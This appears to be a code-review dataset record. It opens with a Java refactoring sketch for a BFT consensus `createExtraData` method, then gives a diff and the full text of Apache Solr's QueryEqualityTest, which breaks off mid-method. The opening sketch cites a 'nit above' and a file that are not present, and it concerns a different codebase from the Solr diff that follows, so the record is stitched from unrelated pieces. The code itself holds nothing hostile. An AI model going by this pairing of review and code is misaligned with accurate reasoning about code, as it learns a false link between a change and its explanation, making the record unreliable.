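As a sketch of the nit above, here is what `createExtraData` from the file in this record might look like with the vote provider pulled into a local variable. This is only an illustration of the suggested refactor, not the merged code, and it assumes `getVoteProviderAfterBlock` returns an `Optional<VoteProvider>` (that type name is not shown in the diff); everything else is taken from the file and patch above.

public Bytes createExtraData(final int round, final BlockHeader parentHeader) {
  final BftContext bftContext = protocolContext.getConsensusState(BftContext.class);
  final ValidatorProvider validatorProvider = bftContext.getValidatorProvider();
  // Fetch the vote provider once and reuse it, instead of repeating the chained call.
  final Optional<VoteProvider> voteProvider =
      validatorProvider.getVoteProviderAfterBlock(parentHeader);
  checkState(voteProvider.isPresent(), "Bft requires a vote provider");
  final Optional<ValidatorVote> proposal =
      voteProvider.get().getVoteAfterBlock(parentHeader, localAddress);

  final List<Address> validators =
      new ArrayList<>(validatorProvider.getValidatorsAfterBlock(parentHeader));

  final BftExtraData extraData =
      new BftExtraData(
          ConsensusHelpers.zeroLeftPad(vanityData, BftExtraDataCodec.EXTRA_VANITY_LENGTH),
          Collections.emptyList(),
          toVote(proposal),
          round,
          validators);

  return bftExtraDataCodec.encode(extraData);
}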
@@ -1190,14 +1190,8 @@ public class QueryEqualityTest extends SolrTestCaseJ4 { assertFuncEquals("gte(foo_i,2)", "gte(foo_i,2)"); assertFuncEquals("eq(foo_i,2)", "eq(foo_i,2)"); - boolean equals = false; - try { - assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)"); - equals = true; - } catch (AssertionError e) { - //expected - } - assertFalse(equals); + expectThrows(AssertionError.class, "expected error, functions are not equal", + () -> assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)")); } public void testChildField() throws Exception {
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.search; import java.util.HashSet; import java.util.Map; import java.util.Set; import junit.framework.AssertionFailedError; import org.apache.lucene.search.Query; import org.apache.lucene.search.QueryUtils; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.request.SolrRequestInfo; import org.apache.solr.response.SolrQueryResponse; import org.junit.AfterClass; import org.junit.BeforeClass; /** * Sanity checks that queries (generated by the QParser and ValueSourceParser * framework) are appropriately {@link Object#equals} and * {@link Object#hashCode()} equivalent. If you are adding a new default * QParser or ValueSourceParser, you will most likely get a failure from * {@link #testParserCoverage} until you add a new test method to this class. * * @see ValueSourceParser#standardValueSourceParsers * @see QParserPlugin#standardPlugins * @see QueryUtils **/ public class QueryEqualityTest extends SolrTestCaseJ4 { @BeforeClass public static void beforeClass() throws Exception { initCore("solrconfig.xml","schema15.xml"); } /** @see #testParserCoverage */ @AfterClass public static void afterClassParserCoverageTest() { if ( ! 
doAssertParserCoverage) return; for (String name : QParserPlugin.standardPlugins.keySet()) { assertTrue("testParserCoverage was run w/o any other method explicitly testing qparser: " + name, qParsersTested.contains(name)); } for (final String name : ValueSourceParser.standardValueSourceParsers.keySet()) { assertTrue("testParserCoverage was run w/o any other method explicitly testing val parser: " + name, valParsersTested.contains(name)); } } /** @see #testParserCoverage */ private static boolean doAssertParserCoverage = false; /** @see #testParserCoverage */ private static final Set<String> qParsersTested = new HashSet<>(); /** @see #testParserCoverage */ private static final Set<String> valParsersTested = new HashSet<>(); public void testDateMathParsingEquality() throws Exception { // regardless of parser, these should all be equivalent queries assertQueryEquals (null ,"{!lucene}f_tdt:2013-09-11T00\\:00\\:00Z" ,"{!lucene}f_tdt:2013-03-08T00\\:46\\:15Z/DAY+6MONTHS+3DAYS" ,"{!lucene}f_tdt:\"2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS\"" ,"{!field f=f_tdt}2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS" ,"{!field f=f_tdt}2013-09-11T00:00:00Z" ,"{!term f=f_tdt}2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS" ,"{!term f=f_tdt}2013-09-11T00:00:00Z" ); } public void testQueryLucene() throws Exception { assertQueryEquals("lucene", "{!lucene}apache solr", "apache solr", "apache solr "); assertQueryEquals("lucene", "+apache +solr", "apache AND solr", " +apache +solr"); } public void testQueryPrefix() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("prefix", req, "{!prefix f=$myField}asdf", "{!prefix f=foo_s}asdf"); } finally { req.close(); } } public void testQueryBoost() throws Exception { SolrQueryRequest req = req("df","foo_s","myBoost","sum(3,foo_i)"); try { assertQueryEquals("boost", req, "{!boost b=$myBoost}asdf", "{!boost b=$myBoost v=asdf}", "{!boost b=sum(3,foo_i)}foo_s:asdf"); } finally { req.close(); } } public void testReRankQuery() throws Exception { final String defType = ReRankQParserPlugin.NAME; SolrQueryRequest req = req("q", "*:*", "rqq", "{!edismax}hello", "rdocs", "20", "rweight", "2", "rows", "10", "start", "0"); try { assertQueryEquals(defType, req, "{!"+defType+" "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=$rdocs "+ReRankQParserPlugin.RERANK_WEIGHT+"=$rweight}", "{!"+defType+" "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=20 "+ReRankQParserPlugin.RERANK_WEIGHT+"=2}"); } finally { req.close(); } req = req("qq", "*:*", "rqq", "{!edismax}hello", "rdocs", "20", "rweight", "2", "rows", "100", "start", "50"); try { assertQueryEquals(defType, req, "{!"+defType+" mainQuery=$qq "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=$rdocs "+ReRankQParserPlugin.RERANK_WEIGHT+"=$rweight}", "{!"+defType+" mainQuery=$qq "+ReRankQParserPlugin.RERANK_QUERY+"=$rqq "+ReRankQParserPlugin.RERANK_DOCS+"=20 "+ReRankQParserPlugin.RERANK_WEIGHT+"=2}"); } finally { req.close(); } } public void testExportQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals("xport", req, "{!xport}"); } finally { req.close(); } } public void testGraphTermsQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals("graphTerms", req, "{!graphTerms f=field1_s maxDocFreq=1000}term1,term2"); } finally { req.close(); } } public void testTlogitQuery() throws Exception { SolrQueryRequest req = req("q", "*:*", "feature", "f", "terms","a,b,c", "weights", 
"100,200,300", "idfs","1,5,7","iteration","1", "outcome","a","positiveLabel","1"); try { assertQueryEquals("tlogit", req, "{!tlogit}"); } finally { req.close(); } } public void testIGainQuery() throws Exception { SolrQueryRequest req = req("q", "*:*", "outcome", "b", "positiveLabel", "1", "field", "x", "numTerms","200"); try { assertQueryEquals("igain", req, "{!igain}"); } finally { req.close(); } } public void testSignificantTermsQuery() throws Exception { SolrQueryRequest req = req("q", "*:*"); try { assertQueryEquals(SignificantTermsQParserPlugin.NAME, req, "{!"+SignificantTermsQParserPlugin.NAME+"}"); } finally { req.close(); } } public void testQuerySwitch() throws Exception { SolrQueryRequest req = req("myXXX", "XXX", "myField", "foo_s", "myQ", "{!prefix f=$myField}asdf"); try { assertQueryEquals("switch", req, "{!switch case.foo=XXX case.bar=zzz case.yak=qqq}foo", "{!switch case.foo=qqq case.bar=XXX case.yak=zzz} bar ", "{!switch case.foo=qqq case.bar=XXX case.yak=zzz v=' bar '}", "{!switch default=XXX case.foo=qqq case.bar=zzz}asdf", "{!switch default=$myXXX case.foo=qqq case.bar=zzz}asdf", "{!switch case=XXX case.bar=zzz case.yak=qqq v=''}", "{!switch case.bar=zzz case=XXX case.yak=qqq v=''}", "{!switch case=XXX case.bar=zzz case.yak=qqq}", "{!switch case=XXX case.bar=zzz case.yak=qqq} ", "{!switch case=$myXXX case.bar=zzz case.yak=qqq} "); assertQueryEquals("switch", req, "{!switch case.foo=$myQ case.bar=zzz case.yak=qqq}foo", "{!query v=$myQ}"); } finally { req.close(); } } public void testMatchAllDocsQueryXmlParser() throws Exception { final String type = "xmlparser"; assertQueryEquals(type, "{!"+type+"}<MatchAllDocsQuery/>", "<MatchAllDocsQuery/>", "<MatchAllDocsQuery></MatchAllDocsQuery>"); } public void testQueryDismax() throws Exception { for (final String type : new String[]{"dismax","edismax"}) { assertQueryEquals(type, "{!"+type+"}apache solr", "apache solr", "apache solr", "apache solr "); assertQueryEquals(type, "+apache +solr", "apache AND solr", " +apache +solr"); } } public void testField() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("field", req, "{!field f=$myField}asdf", "{!field f=$myField v=asdf}", "{!field f=foo_s}asdf"); } finally { req.close(); } } public void testQueryRaw() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("raw", req, "{!raw f=$myField}asdf", "{!raw f=$myField v=asdf}", "{!raw f=foo_s}asdf"); } finally { req.close(); } } public void testQueryTerm() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("term", req, "{!term f=$myField}asdf", "{!term f=$myField v=asdf}", "{!term f=foo_s}asdf"); } finally { req.close(); } } public void testQueryCollapse() throws Exception { SolrQueryRequest req = req("myField","foo_s1", "g_sort","foo_s1 asc, foo_i desc"); try { assertQueryEquals("collapse", req, "{!collapse field=$myField}"); assertQueryEquals("collapse", req, "{!collapse field=$myField max=a}"); assertQueryEquals("collapse", req, "{!collapse field=$myField min=a}", "{!collapse field=$myField min=a nullPolicy=ignore}"); assertQueryEquals("collapse", req, "{!collapse field=$myField sort=$g_sort}", "{!collapse field=$myField sort='foo_s1 asc, foo_i desc'}", "{!collapse field=$myField sort=$g_sort nullPolicy=ignore}"); assertQueryEquals("collapse", req, "{!collapse field=$myField max=a nullPolicy=expand}"); //Add boosted documents to the request context. 
Map context = req.getContext(); Set boosted = new HashSet(); boosted.add("doc1"); boosted.add("doc2"); context.put("BOOSTED", boosted); assertQueryEquals("collapse", req, "{!collapse field=$myField min=a}", "{!collapse field=$myField min=a nullPolicy=ignore}"); } finally { req.close(); } } public void testHash() throws Exception { SolrQueryRequest req = req("partitionKeys","foo_s"); try { assertQueryEquals("hash", req, "{!hash workers=3 worker=0}"); } finally { req.close(); } } public void testQueryNested() throws Exception { SolrQueryRequest req = req("df", "foo_s"); try { assertQueryEquals("query", req, "{!query defType=lucene}asdf", "{!query v='foo_s:asdf'}", "{!query}foo_s:asdf", "{!query}asdf"); } finally { req.close(); } } public void testQueryFunc() throws Exception { // more involved tests of specific functions in other methods SolrQueryRequest req = req("myVar", "5", "myField","foo_i", "myInner","product(4,foo_i)"); try { assertQueryEquals("func", req, "{!func}sum(4,5)", "{!func}sum(4,$myVar)", "sum(4,5)"); assertQueryEquals("func", req, "{!func}sum(1,2,3,4,5)", "{!func}sum(1,2,3,4,$myVar)", "sum(1,2,3,4,5)"); assertQueryEquals("func", req, "{!func}sum(4,$myInner)", "{!func}sum(4,product(4,foo_i))", "{!func}sum(4,product(4,$myField))", "{!func}sum(4,product(4,field(foo_i)))"); } finally { req.close(); } } public void testQueryFrange() throws Exception { SolrQueryRequest req = req("myVar", "5", "low","0.2", "high", "20.4", "myField","foo_i", "myInner","product(4,foo_i)"); try { // NOTE: unlike most queries, frange defaultsto cost==100 assertQueryEquals("frange", req, "{!frange l=0.2 h=20.4}sum(4,5)", "{!frange l=0.2 h=20.4 cost=100}sum(4,5)", "{!frange l=$low h=$high}sum(4,$myVar)"); } finally { req.close(); } } public void testQueryGeofilt() throws Exception { checkQuerySpatial("geofilt"); } public void testQueryBbox() throws Exception { checkQuerySpatial("bbox"); } public void testLocalParamsWithRepeatingParam() throws Exception { SolrQueryRequest req = req("q", "foo", "bq", "111", "bq", "222"); try { assertQueryEquals("dismax", req, "{!dismax}foo", "{!dismax bq=111 bq=222}foo", "{!dismax bq=222 bq=111}foo"); } finally { req.close(); } } private void checkQuerySpatial(final String type) throws Exception { SolrQueryRequest req = req("myVar", "5", "d","109", "pt","10.312,-20.556", "sfield","store"); try { assertQueryEquals(type, req, "{!"+type+" d=109}", "{!"+type+" sfield=$sfield}", "{!"+type+" sfield=store d=109}", "{!"+type+" sfield=store d=$d pt=$pt}", "{!"+type+" sfield=store d=$d pt=10.312,-20.556}", "{!"+type+"}"); // diff SpatialQueryable FieldTypes matter for determining final query assertQueryEquals(type, req, "{!"+type+" sfield=point_hash}", "{!"+type+" sfield=point_hash d=109}", "{!"+type+" sfield=point_hash d=$d pt=$pt}", "{!"+type+" sfield=point_hash d=$d pt=10.312,-20.556}"); assertQueryEquals(type, req, "{!"+type+" sfield=point}", "{!"+type+" sfield=point d=109}", "{!"+type+" sfield=point d=$d pt=$pt}", "{!"+type+" sfield=point d=$d pt=10.312,-20.556}"); } finally { req.close(); } } public void testQueryJoin() throws Exception { SolrQueryRequest req = req("myVar", "5", "df","text", "ff","foo_s", "tt", "bar_s"); try { assertQueryEquals("join", req, "{!join from=foo_s to=bar_s}asdf", "{!join from=$ff to=$tt}asdf", "{!join from=$ff to='bar_s'}text:asdf"); } finally { req.close(); } } public void testQueryScoreJoin() throws Exception { SolrQueryRequest req = req("myVar", "5", "df", "text", "ff", "foo_s", "tt", "bar_s", "scoreavg","avg"); try { assertQueryEquals("join", 
req, "{!join from=foo_s to=bar_s score=avg}asdf", "{!join from=$ff to=$tt score=Avg}asdf", "{!join from=$ff to='bar_s' score=$scoreavg}text:asdf"); } finally { req.close(); } } public void testTerms() throws Exception { assertQueryEquals("terms", "{!terms f=foo_i}10,20,30,-10,-20,-30", "{!terms f=foo_i}10,20,30,-10,-20,-30"); } public void testBlockJoin() throws Exception { assertQueryEquals("parent", "{!parent which=foo_s:parent}dude", "{!parent which=foo_s:parent}dude"); assertQueryEquals("child", "{!child of=foo_s:parent}dude", "{!child of=foo_s:parent}dude"); // zero query case assertQueryEquals(null, "{!parent which=foo_s:parent}", "{!parent which=foo_s:parent}"); assertQueryEquals(null, "{!child of=foo_s:parent}", "{!child of=foo_s:parent}"); assertQueryEquals(null, "{!parent which='+*:* -foo_s:parent'}", "{!child of=foo_s:parent}"); final SolrQueryRequest req = req( "fq","bar_s:baz","fq","{!tag=fqban}bar_s:ban", "ffq","bar_s:baz","ffq","{!tag=ffqban}bar_s:ban"); try { assertQueryEquals("filters", req, "{!parent which=foo_s:parent param=$fq}foo_s:bar", "{!parent which=foo_s:parent param=$ffq}foo_s:bar" // differently named params ); assertQueryEquals("filters", req, "{!parent which=foo_s:parent param=$fq excludeTags=fqban}foo_s:bar", "{!parent which=foo_s:parent param=$ffq excludeTags=ffqban}foo_s:bar" // differently named params ); QueryUtils.checkUnequal(// parent filter is not an equal to child QParser.getParser("{!child of=foo_s:parent}", req).getQuery(), QParser.getParser("{!parent which=foo_s:parent}", req).getQuery()); } finally { req.close(); } } public void testFilters() throws Exception { final SolrQueryRequest req = req( "fq","bar_s:baz","fq","{!tag=fqban}bar_s:ban", "ffq","{!tag=ffqbaz}bar_s:baz","ffq","{!tag=ffqban}bar_s:ban"); try { assertQueryEquals("filters", req, "{!filters param=$fq}foo_s:bar", "{!filters param=$fq}foo_s:bar", "{!filters param=$ffq}foo_s:bar" // differently named params ); assertQueryEquals("filters", req, "{!filters param=$fq excludeTags=fqban}foo_s:bar", "{!filters param=$ffq excludeTags=ffqban}foo_s:bar" ); assertQueryEquals("filters", req, "{!filters excludeTags=top}{!tag=top v='foo_s:bar'}", "{!filters param=$ffq excludeTags='ffqban,ffqbaz'}" ); QueryUtils.checkUnequal( QParser.getParser("{!filters param=$fq}foo_s:bar", req).getQuery(), QParser.getParser("{!filters param=$fq excludeTags=fqban}foo_s:bar", req).getQuery()); } finally { req.close(); } } public void testGraphQuery() throws Exception { SolrQueryRequest req = req("from", "node_s", "to","edge_s", "traversalFilter","foo", "returnOnlyLeaf","true", "returnRoot","false", "maxDepth","2", "useAutn","false" ); // make sure all param subsitution works for all args to graph query. 
assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s}*:*", "{!graph from=$from to=$to}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false maxDepth=2}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot maxDepth=$maxDepth}*:*"); assertQueryEquals("graph", req, "{!graph from=node_s to=edge_s traversalFilter=foo returnOnlyLeaf=true returnRoot=false maxDepth=2 useAutn=false}*:*", "{!graph from=$from to=$to traversalFilter=$traversalFilter returnOnlyLeaf=$returnOnlyLeaf returnRoot=$returnRoot maxDepth=$maxDepth useAutn=$useAutn}*:*"); } public void testQuerySurround() throws Exception { assertQueryEquals("surround", "{!surround}and(apache,solr)", "and(apache,solr)", "apache AND solr"); } public void testQueryComplexPhrase() throws Exception { assertQueryEquals("complexphrase", "{!complexphrase df=text}\"jo* smith\"", "text:\"jo* smith\""); assertQueryEquals("complexphrase", "{!complexphrase df=title}\"jo* smith\"", "title:\"jo* smith\""); } public void testFuncTestfunc() throws Exception { assertFuncEquals("testfunc(foo_i)","testfunc(field(foo_i))"); assertFuncEquals("testfunc(23)"); assertFuncEquals("testfunc(sum(23,foo_i))", "testfunc(sum(23,field(foo_i)))"); } public void testFuncOrd() throws Exception { assertFuncEquals("ord(foo_s)","ord(foo_s )"); } public void testFuncLiteral() throws Exception { SolrQueryRequest req = req("someVar","a string"); try { assertFuncEquals(req, "literal('a string')","literal(\"a string\")", "literal($someVar)"); } finally { req.close(); } } public void testFuncRord() throws Exception { assertFuncEquals("rord(foo_s)","rord(foo_s )"); } public void testFuncCscore() throws Exception { assertFuncEquals("cscore()", "cscore( )"); } public void testFuncTop() throws Exception { assertFuncEquals("top(sum(3,foo_i))"); } public void testFuncLinear() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "linear(foo_i,$someVar,42)", "linear(foo_i, 27, 42)"); } finally { req.close(); } } public void testFuncRecip() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "recip(foo_i,$someVar,42, 27 )", "recip(foo_i, 27, 42,$someVar)"); } finally { req.close(); } } public void testFuncScale() throws Exception { SolrQueryRequest req = req("someVar","27"); try { assertFuncEquals(req, "scale(field(foo_i),$someVar,42)", "scale(foo_i, 27, 42)"); } finally { req.close(); } } public void testFuncDiv() throws Exception { assertFuncEquals("div(5,4)", "div(5, 4)"); assertFuncEquals("div(foo_i,4)", "div(foo_i, 4)", "div(field('foo_i'), 4)"); assertFuncEquals("div(foo_i,sub(4,field('bar_i')))", "div(field(foo_i), sub(4,bar_i))"); } public void testFuncMod() throws Exception { assertFuncEquals("mod(5,4)", "mod(5, 4)"); assertFuncEquals("mod(foo_i,4)", "mod(foo_i, 4)", 
"mod(field('foo_i'), 4)"); assertFuncEquals("mod(foo_i,sub(4,field('bar_i')))", "mod(field(foo_i), sub(4,bar_i))"); } public void testFuncMap() throws Exception { assertFuncEquals("map(field(foo_i), 0, 45, 100)", "map(foo_i, 0.0, 45, 100)"); } public void testFuncSum() throws Exception { assertFuncEquals("sum(5,4)", "add(5, 4)"); assertFuncEquals("sum(5,4,3,2,1)", "add(5, 4, 3, 2, 1)"); assertFuncEquals("sum(foo_i,4)", "sum(foo_i, 4)", "sum(field('foo_i'), 4)"); assertFuncEquals("add(foo_i,sub(4,field('bar_i')))", "sum(field(foo_i), sub(4,bar_i))"); } public void testFuncProduct() throws Exception { assertFuncEquals("product(5,4,3,2,1)", "mul(5, 4, 3, 2, 1)"); assertFuncEquals("product(5,4)", "mul(5, 4)"); assertFuncEquals("product(foo_i,4)", "product(foo_i, 4)", "product(field('foo_i'), 4)"); assertFuncEquals("mul(foo_i,sub(4,field('bar_i')))", "product(field(foo_i), sub(4,bar_i))"); } public void testFuncSub() throws Exception { assertFuncEquals("sub(5,4)", "sub(5, 4)"); assertFuncEquals("sub(foo_i,4)", "sub(foo_i, 4)"); assertFuncEquals("sub(foo_i,sum(4,bar_i))", "sub(foo_i, sum(4,bar_i))"); } public void testFuncVector() throws Exception { assertFuncEquals("vector(5,4, field(foo_i))", "vector(5, 4, foo_i)"); assertFuncEquals("vector(foo_i,4)", "vector(foo_i, 4)"); assertFuncEquals("vector(foo_i,sum(4,bar_i))", "vector(foo_i, sum(4,bar_i))"); } public void testFuncQuery() throws Exception { SolrQueryRequest req = req("myQ","asdf"); try { assertFuncEquals(req, "query($myQ)", "query($myQ,0)", "query({!lucene v=$myQ},0)"); } finally { req.close(); } } public void testFuncBoost() throws Exception { SolrQueryRequest req = req("myQ","asdf"); try { assertFuncEquals(req, "boost($myQ,sum(4,5))", "boost({!lucene v=$myQ},sum(4,5))"); } finally { req.close(); } } public void testFuncJoindf() throws Exception { assertFuncEquals("joindf(foo,bar)"); } public void testFuncGeodist() throws Exception { SolrQueryRequest req = req("pt","10.312,-20.556", "sfield","store"); try { assertFuncEquals(req, "geodist()", "geodist($sfield,$pt)", "geodist(store,$pt)", "geodist(field(store),$pt)", "geodist(store,10.312,-20.556)"); } finally { req.close(); } } public void testFuncHsin() throws Exception { assertFuncEquals("hsin(45,true,0,0,45,45)"); } public void testFuncGhhsin() throws Exception { assertFuncEquals("ghhsin(45,point_hash,'asdf')", "ghhsin(45,field(point_hash),'asdf')"); } public void testFuncGeohash() throws Exception { assertFuncEquals("geohash(45,99)"); } public void testFuncDist() throws Exception { assertFuncEquals("dist(2,45,99,101,111)", "dist(2,vector(45,99),vector(101,111))"); } public void testFuncSqedist() throws Exception { assertFuncEquals("sqedist(45,99,101,111)", "sqedist(vector(45,99),vector(101,111))"); } public void testFuncMin() throws Exception { assertFuncEquals("min(5,4,3,2,1)", "min(5, 4, 3, 2, 1)"); assertFuncEquals("min(foo_i,4)", "min(field('foo_i'), 4)"); assertFuncEquals("min(foo_i,sub(4,field('bar_i')))", "min(field(foo_i), sub(4,bar_i))"); } public void testFuncMax() throws Exception { assertFuncEquals("max(5,4,3,2,1)", "max(5, 4, 3, 2, 1)"); assertFuncEquals("max(foo_i,4)", "max(field('foo_i'), 4)"); assertFuncEquals("max(foo_i,sub(4,field('bar_i')))", "max(field(foo_i), sub(4,bar_i))"); } public void testFuncMs() throws Exception { // Note ms() takes in field name, not field(...) 
assertFuncEquals("ms()", "ms(NOW)"); assertFuncEquals("ms(2000-01-01T00:00:00Z)", "ms('2000-01-01T00:00:00Z')"); assertFuncEquals("ms(myDateField_dt)", "ms('myDateField_dt')"); assertFuncEquals("ms(2000-01-01T00:00:00Z,myDateField_dt)", "ms('2000-01-01T00:00:00Z','myDateField_dt')"); assertFuncEquals("ms(myDateField_dt, NOW)", "ms('myDateField_dt', NOW)"); } public void testFuncMathConsts() throws Exception { assertFuncEquals("pi()"); assertFuncEquals("e()"); } public void testFuncTerms() throws Exception { SolrQueryRequest req = req("myField","field_t","myTerm","my term"); try { for (final String type : new String[]{"docfreq","termfreq", "totaltermfreq","ttf", "idf","tf"}) { // NOTE: these functions takes a field *name* not a field(..) source assertFuncEquals(req, type + "('field_t','my term')", type + "(field_t,'my term')", type + "(field_t,$myTerm)", type + "(field_t,$myTerm)", type + "($myField,$myTerm)"); } // ttf is an alias for totaltermfreq assertFuncEquals(req, "ttf(field_t,'my term')", "ttf('field_t','my term')", "totaltermfreq(field_t,'my term')"); } finally { req.close(); } } public void testFuncSttf() throws Exception { // sttf is an alias for sumtotaltermfreq assertFuncEquals("sttf(foo_t)", "sttf('foo_t')", "sumtotaltermfreq(foo_t)", "sumtotaltermfreq('foo_t')"); assertFuncEquals("sumtotaltermfreq('foo_t')"); } public void testFuncNorm() throws Exception { assertFuncEquals("norm(foo_t)","norm('foo_t')"); } public void testFuncMaxdoc() throws Exception { assertFuncEquals("maxdoc()"); } public void testFuncNumdocs() throws Exception { assertFuncEquals("numdocs()"); } public void testFuncBools() throws Exception { SolrQueryRequest req = req("myTrue","true","myFalse","false"); try { assertFuncEquals(req, "true","$myTrue"); assertFuncEquals(req, "false","$myFalse"); } finally { req.close(); } } public void testFuncExists() throws Exception { SolrQueryRequest req = req("myField","field_t","myQ","asdf"); try { assertFuncEquals(req, "exists(field_t)", "exists($myField)", "exists(field('field_t'))", "exists(field($myField))"); assertFuncEquals(req, "exists(query($myQ))", "exists(query({!lucene v=$myQ}))"); } finally { req.close(); } } public void testFuncNot() throws Exception { SolrQueryRequest req = req("myField","field_b", "myTrue","true"); try { assertFuncEquals(req, "not(true)", "not($myTrue)"); assertFuncEquals(req, "not(not(true))", "not(not($myTrue))"); assertFuncEquals(req, "not(field_b)", "not($myField)", "not(field('field_b'))", "not(field($myField))"); assertFuncEquals(req, "not(exists(field_b))", "not(exists($myField))", "not(exists(field('field_b')))", "not(exists(field($myField)))"); } finally { req.close(); } } public void testFuncDoubleValueBools() throws Exception { SolrQueryRequest req = req("myField","field_b","myTrue","true"); try { for (final String type : new String[]{"and","or","xor"}) { assertFuncEquals(req, type + "(field_b,true)", type + "(field_b,$myTrue)", type + "(field('field_b'),true)", type + "(field($myField),$myTrue)", type + "($myField,$myTrue)"); } } finally { req.close(); } } public void testFuncIf() throws Exception { SolrQueryRequest req = req("myBoolField","foo_b", "myIntField","bar_i", "myTrue","true"); try { assertFuncEquals(req, "if(foo_b,bar_i,25)", "if($myBoolField,bar_i,25)", "if(field('foo_b'),$myIntField,25)", "if(field($myBoolField),field('bar_i'),25)"); assertFuncEquals(req, "if(true,37,field($myIntField))", "if($myTrue,37,$myIntField)"); } finally { req.close(); } } public void testFuncDef() throws Exception { SolrQueryRequest req = 
req("myField","bar_f"); try { assertFuncEquals(req, "def(bar_f,25)", "def($myField,25)", "def(field('bar_f'),25)"); assertFuncEquals(req, "def(ceil(bar_f),25)", "def(ceil($myField),25)", "def(ceil(field('bar_f')),25)"); } finally { req.close(); } } public void testFuncConcat() throws Exception { SolrQueryRequest req = req("myField","bar_f","myOtherField","bar_t"); try { assertFuncEquals(req, "concat(bar_f,bar_t)", "concat($myField,bar_t)", "concat(bar_f,$myOtherField)", "concat($myField,$myOtherField)"); } finally { req.close(); } } public void testFuncSingleValueMathFuncs() throws Exception { SolrQueryRequest req = req("myVal","45", "myField","foo_i"); for (final String func : new String[] {"abs","rad","deg","sqrt","cbrt", "log","ln","exp","sin","cos","tan", "asin","acos","atan", "sinh","cosh","tanh", "ceil","floor","rint"}) { try { assertFuncEquals(req, func + "(field(foo_i))", func + "(foo_i)", func + "($myField)"); assertFuncEquals(req, func + "(45)", func+ "($myVal)"); } finally { req.close(); } } } public void testFuncDoubleValueMathFuncs() throws Exception { SolrQueryRequest req = req("myVal","45", "myOtherVal", "27", "myField","foo_i"); for (final String func : new String[] {"pow","hypot","atan2"}) { try { assertFuncEquals(req, func + "(field(foo_i),$myVal)", func+"(foo_i,$myVal)", func + "($myField,45)"); assertFuncEquals(req, func+"(45,$myOtherVal)", func+"($myVal,27)", func+"($myVal,$myOtherVal)"); } finally { req.close(); } } } public void testFuncStrdist() throws Exception { SolrQueryRequest req = req("myVal","zot", "myOtherVal", "yak", "myField","foo_s1"); try { assertFuncEquals(req, "strdist(\"zot\",literal('yak'),edit)", "strdist(literal(\"zot\"),'yak', edit )", "strdist(literal($myVal),literal($myOtherVal),edit)"); assertFuncEquals(req, "strdist(\"zot\",literal($myOtherVal),ngram)", "strdist(\"zot\",'yak', ngram, 2)"); assertFuncEquals(req, "strdist(field('foo_s1'),literal($myOtherVal),jw)", "strdist(field($myField),\"yak\",jw)", "strdist($myField,'yak', jw)"); } finally { req.close(); } } public void testFuncField() throws Exception { assertFuncEquals("field(\"foo_i\")", "field('foo_i\')", "foo_i"); // simple VS of single valued field should be same as asking for min/max on that field assertFuncEquals("field(\"foo_i\")", "field('foo_i',min)", "field(foo_i,'min')", "field('foo_i',max)", "field(foo_i,'max')", "foo_i"); // multivalued field with selector String multif = "multi_int_with_docvals"; SolrQueryRequest req = req("my_field", multif); // this test is only viable if it's a multivalued field, sanity check the schema assertTrue(multif + " is no longer multivalued, who broke this schema?", req.getSchema().getField(multif).multiValued()); assertFuncEquals(req, "field($my_field,'MIN')", "field('"+multif+"',min)"); assertFuncEquals(req, "field($my_field,'max')", "field('"+multif+"',Max)"); } public void testFuncCurrency() throws Exception { assertFuncEquals("currency(\"amount\")", "currency('amount\')", "currency(amount)", "currency(amount,USD)", "currency('amount',USD)"); } public void testFuncRelatedness() throws Exception { SolrQueryRequest req = req("fore","foo_s:front", "back","foo_s:back"); try { assertFuncEquals(req, "agg_relatedness({!query v='foo_s:front'}, {!query v='foo_s:back'})", "agg_relatedness($fore, $back)"); } finally { req.close(); } } public void testTestFuncs() throws Exception { assertFuncEquals("sleep(1,5)", "sleep(1,5)"); assertFuncEquals("threadid()", "threadid()"); } // TODO: more tests public void testQueryMaxScore() throws Exception { 
